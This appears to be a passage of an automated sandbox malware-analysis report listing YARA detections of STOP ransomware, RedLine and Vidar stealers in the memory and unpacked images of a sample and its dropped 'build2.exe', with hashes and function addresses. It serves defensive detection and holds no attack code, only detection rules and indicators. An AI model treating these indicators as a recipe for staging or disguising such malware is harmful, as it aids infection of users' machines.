Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.421698327.0000000002162000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000000.410711943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.427284724.0000000000696000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.404465575.00000000007FF000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00426050 0_2_00426050
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00418010 0_2_00418010
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00418DF0 0_2_00418DF0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229CA10 0_2_0229CA10
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022A0B00 0_2_022A0B00
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229DBE0 0_2_0229DBE0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229B000 0_2_0229B000
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229B0B0 0_2_0229B0B0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022930EE 0_2_022930EE
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022A00D0 0_2_022A00D0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022B18D0 0_2_022B18D0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022BE9A3 0_2_022BE9A3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022BF9B0 0_2_022BF9B0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229E6E0 0_2_0229E6E0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229C760 0_2_0229C760
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040D240 1_2_0040D240
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 1_2_00419F90
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040C070 1_2_0040C070
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042E003 1_2_0042E003
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042F010 1_2_0042F010
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004021C0 1_2_004021C0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044237E 1_2_0044237E
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004344FF 1_2_004344FF
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449506 1_2_00449506
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0043E5A3 1_2_0043E5A3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044B5B1 1_2_0044B5B1
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040A660 1_2_0040A660
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0041E690 1_2_0041E690
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00402750 1_2_00402750
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040A710 1_2_0040A710
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 1_2_0040F730
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044D7A1 1_2_0044D7A1
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042C804 1_2_0042C804
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044D9DC 1_2_0044D9DC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449A71 1_2_00449A71
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00443B40 1_2_00443B40
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00402B80 1_2_00402B80
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044ACFF 1_2_0044ACFF
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040DD40 1_2_0040DD40
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040BDC0 1_2_0040BDC0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042CE51 1_2_0042CE51
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00420F30 1_2_00420F30
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449FE3 1_2_00449FE3
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process Stats: CPU usage > 98%
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe 12A51367C5C85FF3C1DC73743CFACE2E01ACCECF2879A36ADBDDF566D52987B3
Source: 2OmglUwx83.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.build2.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
